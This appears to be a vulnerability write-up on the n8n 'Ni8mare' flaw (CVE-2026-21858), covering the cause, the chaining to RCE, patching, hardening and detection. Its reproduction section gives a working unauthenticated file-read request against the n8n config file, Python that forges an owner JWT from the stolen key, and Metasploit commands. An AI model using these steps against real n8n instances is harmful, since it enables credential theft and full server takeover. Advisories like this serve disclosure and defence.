n8n unauthenticated RCE (Ni8mare): CVE-2026-21858
The form node skips Content-Type validation, so one application/json request makes it read an arbitrary file. The key inside the config forges an admin JWT, and a sandbox bypass turns that into RCE.
Overview
| Field | Detail |
|---|---|
| CVE | CVE-2026-21858 |
| CVSS | 10.0 (Critical) |
| CWE | CWE-20 improper input validation |
| Affected | 1.65.0 to 1.120.x |
| Fixed in | 1.121.0 (1.121.3 recommended) |
| Disclosed | 2026-01-07 |
| Exploited in the wild | Metasploit module plus several PoCs |
n8n is one of the most widely used open-source workflow automation platforms. On 7 January 2026 researchers at Cyera disclosed this maximum-severity flaw, which the community named Ni8mare.
Asset scanning put roughly 166,426 n8n-related assets on the public internet. The flaw starts as arbitrary file read, and another sandbox bypass vulnerability turns it into full remote code execution.
How it was found
The Cyera team audited the form node and webhook handling. The problem is an unremarkable-looking ordering mistake: while handling file uploads, the form node does not validate the Content-Type header.
A correct implementation confirms the request is multipart/form-data before entering the file handling path, but n8n skips that step before calling the file handling function. An attacker can therefore send Content-Type: application/json and construct their own files object in the JSON body, where each entry supplies a filepath directly. The form node then reads whatever path the requester named.
The amplifier is a second vulnerability: this file read chains with the sandbox bypass CVE-2025-68613 to form a complete RCE chain. One moderate flaw plus another moderate flaw lands on a maximum score.
Reproduction
Everything below is for authorised security testing only.
Start an affected version in Docker, then create a workflow containing a Form Trigger node in the admin UI. The key configuration is setting On Error to Continue on the Extract from File step and marking the workflow Active.
Step one: Content-Type confusion reads any file. The body is plain JSON, with file name and path supplied by the attacker:
POST /form/<form-id>
Content-Type: application/json
{ "files": { "file1": { "filepath": "/home/node/.n8n/config" } } }
The response carries the file contents. No authentication is needed, because the public form endpoint is reachable by design.
Step two: read the key and forge an admin JWT. The config file holds FINAL_SECRET_KEY, used to sign session tokens, and N8N_ENCRYPTION_KEY. With the key, an owner-role token can be signed offline:
token = jwt.encode(
{"id": "1", "email": "admin@n8n.local", "role": "owner",
"iat": now, "exp": now + 86400},
secret_key, algorithm="HS256")
Step three: land execution through the sandbox bypass. Call the REST API with the forged token to create a workflow containing a Function node whose code uses child_process to run a command. The sandbox bypass, CVE-2025-68613, is what lets that code actually run.
To verify only the file read, the existing Metasploit auxiliary module is enough:
msf > use auxiliary/gather/ni8mare_cve_2026_21858
msf auxiliary(...) > set TARGETURI /form/<form-id>
msf auxiliary(...) > set FILEPATH /home/node/.n8n/config
msf auxiliary(...) > run
Fix
Upgrade to 1.121.0 or later, and prefer 1.121.3:
npm install n8n@1.121.0
docker pull n8nio/n8n:1.121.0
Configuration alone reduces the risk substantially: restrict or disable publicly reachable webhooks and form endpoints; place n8n behind a VPN, a private ingress or a strict IP allowlist; if a public webhook is genuinely required, front it with a reverse proxy providing rate limiting and request validation, and narrow the reachable endpoints to the necessary few; the NODES_EXCLUDE environment variable can exclude risky form nodes.
For detection, review n8n execution logs for anomalous form submissions, unexpected file reads and suspicious workflow runs. On confirmed compromise, rotate every third-party service credential integrated through n8n without delay, since automation platforms tend to hold many of them.
Verdict
The core problem in Ni8mare is missing input validation. The form node skipped a basic Content-Type check while handling uploads, and that small omission is amplified into a complete RCE chain under the right conditions.
Its threat model deserves separate note. Alone, CVE-2026-21858 is arbitrary file read; chained with CVE-2025-68613 it becomes file read, credential theft, privilege escalation, RCE. And one HTTP request is all it takes to begin.

Comments
…